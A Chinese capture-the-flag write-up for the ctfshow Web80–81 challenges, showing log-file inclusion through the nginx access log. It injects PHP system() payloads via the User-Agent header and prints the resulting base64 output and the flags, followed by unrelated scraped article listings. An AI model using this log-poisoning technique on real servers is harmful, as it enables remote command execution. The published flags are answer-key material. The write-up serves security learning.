2022/4/16

题目过滤了php和data,我们这次要用日志文件包含

先抓包

nginx日志的默认路径为/var/log/nginx.

ssh日志的默认路径为/var/log/auth.log

SSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述

现在要将恶意代码写入日志文件

/?file=/var/log/nginx/access.log
<?php system(ls); ?>

得到fl0g.php

在User-Agent中输入

<?php system('base64 fl0g.php');?>

得到flag的base64编码

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMToyNDozNw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTE6MjU6MDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s4Mzc4ZGVhZC1kYzQxLTRmNDctYTY5ZS01MmVkZDY1MjEwZjd9Ijs=

解码后得到

ctfshow{8378dead-dc41-4f47-a69e-52edd65210f7}

Web81

多过滤了:

/?file=/var/log/nginx/access.log
<?php system(ls); ?>

在User-Agent中输入

<?php system('base64 fl0g.php');?>

ctfshow{95544252-d2bb-4a39-96f8-26d34164996e}

ctfshow 日志包含Web80-81相关推荐

  1. CTFshow 文件包含 web80

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...

  2. CTFshow 文件包含 web81

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...

  3. 通过日志恢复oracle序列,(存档日志包含序列84,要求序列36)怎么恢复啊?

    (存档日志包含序列84,要求序列36)怎么恢复啊? SQL> startup mount; ORACLE 例程已启动 Total System Global Area  135338868 by ...

  4. 渗透测试-中间件日志包含绕过和php文件读写包含

    中间件日志包含绕过 文章目录 中间件日志包含绕过 前言 一.什么是中间件日志包含绕过 二.中间件日志包含漏洞获取shell 1.中间件日志包含 2.利用Apache日志获取shell 总结 前言 一. ...

  5. ctfshow 文件包含Web78-79

    Ctfshow文件包含漏洞 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件.如果文件中存在恶意代码,无论文件是什么类型 ...

  6. ctfshow 文件包含 web 78 -117

    目录 web 78 web 79 web 80 web 81 web 82-86(环境暂时做不了) web 87 web 88 web 116 web 117 web 78 data://text/p ...

  7. CTFshow 文件包含 web82

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...

  8. 尚未备份数据库 *** 的日志尾部。如果该日志包含您不希望丢失的工作,请使用 BACKUP LOG WITH NORECOVERY 备份该日志。...

    使用SQL Server 2005还原备份的数据库文件时出现的问题,如题. 前提:如果你有个数据库的.bak的备份文件. 右键点击 数据库任务-->还原-->数据库 1.还原的目标选择你要 ...

  9. CTFshow 文件包含 web117

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # ...

  10. CTFshow 文件包含 web116

    目录 源码 思路 题解 总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题

最新文章

  1. 信息安全的一些东西,初步查询了解!
  2. python如何自学模块_跟老齐学Python之Import 模块
  3. ASPJPEG图片处理组件安装和使用问题
  4. python退出循环快捷_python退出循环的方法
  5. select_arg_from_python相关的测试程序
  6. iis vue history 配置_Vue实战——vueRouter路由的添加与配置
  7. (原创)eCos驱动分析 之 ISR是如何与硬件中断联系起来的?
  8. 最长非下降子序列(O(nlogn))(offer收割)
  9. 多线程中 start()和run()方法的区别
  10. poj 2387 Til the Cows Come Home dijkstra
  11. 大端和小端存储模式解析
  12. 网吧技术员应聘问卷你能答多少
  13. php中清除文本框,php如何清除文本框
  14. 电脑问题处理篇4:解决华硕电脑“ASUS Battery Health Charging”软件界面呈现灰色不能选择充电模式的问题
  15. 2018年的25个最佳数据可视化
  16. sublime 集成 markdown 插件【小明同学】
  17. 对神经网络的简单理解,简述什么是神经网络
  18. 中小企业进行工业互联网改革的痛点和解决方案
  19. 从比特保存和信息保存看数字资源长期保存
  20. LDAPBrowser

热门文章

  1. UVA - 10827 Maximum sum on a torus
  2. 计算机知识大赛五书,2017昆山千灯镇事业单位考试常识——昆山市情解析
  3. 真正免费的天气API,无需注册申请key
  4. MBR15200FAC-ASEMI插件肖特基二极管MBR15200FAC
  5. class path resource [applicationContext.xml] cannot be opened because it does not exist,jar包缺失
  6. 交换机putty怎么调试_debian10使用putty配置交换机console口
  7. abp ddd mysql_初识ABP vNext(1):开篇计划基础知识
  8. SAS逻辑回归之多分类
  9. 曲线积分于曲面积分(后篇 曲面积分-坐标曲面积分-高斯公式-斯托克斯公式)
  10. SpringCloud 微服务网关Gateway常用限流算法以及简单实现